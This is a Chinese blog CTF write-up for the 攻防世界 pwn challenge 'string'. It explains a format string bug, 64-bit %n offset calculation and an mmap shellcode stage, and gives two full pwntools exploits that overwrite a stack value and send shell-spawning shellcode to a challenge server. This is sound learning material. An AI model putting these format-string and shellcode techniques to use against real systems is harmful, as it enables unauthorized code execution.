攻防世界 pwn string

Loτυs

已于 2022-07-06 16:57:21 修改

阅读量4k

点赞数 12

分类专栏： pwn fmt 文章标签： pwn

于 2021-11-15 00:17:30 首次发布

本文链接：https://blog.csdn.net/Invin_cible/article/details/121326452

版权

pwn fmt 专栏收录该内容

3 篇文章 0 订阅

订阅专栏

本文详细介绍了如何解决一个CTF挑战，涉及的主要技术包括alarm函数、格式化字符串漏洞和shellcode执行。通过理解程序流程，利用main函数中的内存泄露和sub_400BB9()的格式化字符串漏洞，找到并修改内存中的值，最终通过shellcode获取flag。解题过程中还提到了64位程序中%n的使用和偏移量计算，并给出了两种不同的解决方案。

摘要由CSDN通过智能技术生成

攻防世界string应该是新手区数一数二的难题，难点在理解程序流程。

先观察主函数:

alarm函数

什么是alarm函数？

如上图所示，在做一些pwn题的时候，我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数，即十进制对应60，所以该函数的作用是在程序运行60秒后，给进程发送SIGALRM信号，如果不另编写程序接受处理此信号，则默认结束此程序。

为什么要使用alarm函数？

一是比赛中常要远程连接服务器解题，官方不希望有队伍长时间解不出来题浪费服务器资源

二是能对动态调试产生一定影响，干扰选手解题

关闭alarm函数的方法

在命令行里：

# 将程序名为ProgrammName中的alarm替换为isnan
> sed -i s/alarm/isnan/g ./ProgrammName

不过这道题alarm函数对于程序影响不大，可以不用关闭。

程序流程

如图，系统分配内存给v4,v4数组里的内容分别是68和85。

main函数中重点关注

程序把v4和v4+1的地址给泄露出来了。

程序继续进入sub_400D72()，提示输入name后进入sub_400A7D()，这里不再赘述，不选择east和1就会被干掉。

选择east和1后我们进入sub_400BB9()

这里发现格式化字符串漏洞。

最后进入sub_400CA6()

发现若a1[0]等于a1[1]，就可将v1变成可执行函数

（mmap是一种内存映射文件的方法)，可通过read函数读入一串机器码，然后运行，这相当于是把shellcode送你脸上来了。

#综合分析

shellcode

我们的目的是拿到flag，此题中没有system函数，因此需要通过shellcode得到flag，而在sub_400CA6()中可以执行shellcode。

shellcode =asm(shellcraft.sh()) 
r.send(shellcode)

但是这几句有些时候会出错，在from pwn import *后加入如下语句则不会出错。

context(arch='amd64', os='linux', log_level='debug')

shellcode的条件

在程序流程中我们分析到了，必须满足a1[0]=a1[1]才能进行shellcode，因此我们接下来的目标就是让这两个值相等。sub_400CA6()中传入了a指针参数，因此a1[0],a1[1]其实就是v4[0]和v4[1],传递过程是通过sub_400D72传入到sub_400CA6()。

那么我们接下来的任务就是让v4[0]=v4[1]。

在分析程序流程时我们提到过，程序在main函数里泄露过v4的地址，而程序又在sub_400BB9()中存在格式化字符漏洞，那我们就可以得到v4地址后将v4[0]的值通过格式化字符串漏洞改为和v4[1]相等

1.得到v4的地址

r.recvuntil("secret[0] is ")
addr = int(r.recvuntil('\n')[:-1],16)

知识点1：int(x,y)是将x转换成y进制的数，如上就是将收到的值转换成16进制

知识点2：[:-1]为python切片知识，自行百度。

2.通过%n改写v4[0]的值

在此之前我们先说说%n，%n的作用不是输出值，而是将一个值写进一个变量或一个地址。

什么是偏移

偏移的理解借助另一个博客的文章：

拿改栈上一个参数的值为例，更改我们的输入
我起初不懂为什么会有这个偏移，看wiki说的我以为是简单的入栈顺序造成的，后来看了这个才知道为什么有这个偏移，简单来说就是，例如

char a[100];
scanf(“%s”,a);
printf(a);
这里输入a时是把栈上a的值给替换成输入的值，这个栈指的是main函数的栈，因为a是mian函数的局部变量，然后就又有printf函数的调用，这时printf函数的栈在a栈桢的上面，然后printf入栈的参数是a的地址，在这里就有了偏移，我们要改的不是printf入栈的那个参数，那个只是地址，改了之后只是不对应a了，对a真正的值没影响，我们要改的是a，也就是在这个函数的栈里去修改别的函数的栈的内容，我们要计算printf函数入参的那个栈桢相较a变量存的栈桢的差，这是偏移的原因

原文链接：[https://blog.csdn.net/sls_xsl/article/details/113798097]

我们要做什么

实际上我们要做的事就是往栈里写进一个地址，这个地址就是我们要改变的变量的值的地址，然后找到这个地址在栈中的偏移量，然后利用%a $n 来改变值。 (其中 a 是偏移量) 通常情况下我们采用 a d d r +$ n或者%a$n+addr的方式去利用格式化字符漏洞，地址写在前面或后面，偏移量也会不同。

**注意！！！！！这道题是64位程序，64位程序由于字长为8，64位程序的地址存在零，所以想要利用偏移来泄露地址内容或者改写其内容的话，目的地址不能放在格式化符号之前，否则printf在遇到零字节时会被截断，此时应将目的地址放在格式化符号后面。**

同时如果要把地址防格式化符号后面，要注意堆栈内容对齐，也就是说我们要在%an$b和addr的中间填充适当字符来使字符总量能被8整除。这样在取偏移量的时候才能使偏移量为整数时，取到我们所需要的地址。

偏移量的确定

方法一：gdb调试。

方法二：输入aaaaaaaa-%p-%p-%p-%p-%p-%p

注意：64位程序不能用%x来确定偏移量，且64位程序需要输入aaaaaaaa而不是aaaa

利用 %x 来获取对应栈的内存，但建议使用 %p，可以不用考虑位数的区别。–转自ctf-wiki

如图0x6161616161616161即为我们输入aaaaaaaa的十六进制值，也就是说print栈中第一个参数的偏移为8.

payload ='b'*85+'%20$n'+'a'*6+p64(addr).decode('unicode_escape')

其中b乘85是我们需要v4[0]变成的值，a乘6为填充字符来使堆栈内容对齐，计算一下地址前面共有96个字符（%20$n算五个字符，这里博主因为这个检查了快一个小时），偏移量就应该加上96/8=12，故最后的偏移量为20。

完整exp：

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
r = remote("111.200.241.244",49213)
#r = process('./stRing')
r.recvuntil("secret[0] is ")
addr = int(r.recvuntil('\n')[:-1],16)
r.recvuntil("What should your character's name be:")
r.sendline('invincible')
r.recvuntil("So, where you will go?east or up?")
a = r.recvuntil(":")[:-1]
r.sendline('east')
r.recvuntil("go into there(1), or leave(0)?:")
r.sendline('1')
r.recvuntil("'Give me an address'")
r.sendline('1111')
r.recvuntil("And, you wish is:")
payload ='b'*85+'%20$n'+'a'*6+p64(addr).decode('unicode_escape')
r.sendline(payload)
r.recvuntil("Wizard: I will help you! USE YOU SPELL")
shellcode =asm(shellcraft.sh()) 
r.send(shellcode)
r.interactive()

last：记得把文件名改成stRing，由于string是关键字，运行时可能会出错。

解法二：更简单的解法

如图,程序中有一段：give me an address，这其实就给我们提示了，v2是调用print前的最后一个参数，也就是说它在程序中的偏移量是printf第一个参数的偏移量减一。我们可以验证一下

如图我们输入的1111的十六进制即为0x457，偏移量为7。

完整exp:

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
r = remote("111.200.241.244",57932)
#r = process('./string')
r.recvuntil("secret[0] is ")
addr = int(r.recvuntil('\n')[:-1],16)
r.recvuntil("What should your character's name be:")
r.sendline('invincible')
r.recvuntil("So, where you will go?east or up?:")
r.sendline('east')
r.recvuntil("go into there(1), or leave(0)?:")
r.sendline('1')
r.recvuntil("'Give me an address'")
r.sendline(str(addr))
r.recvuntil("And, you wish is:")
payload ='b'*85+'%7$n'
r.sendline(payload)
r.recvuntil("Wizard: I will help you! USE YOU SPELL")
shellcode =asm(shellcraft.sh()) 
r.send(shellcode)
r.interactive()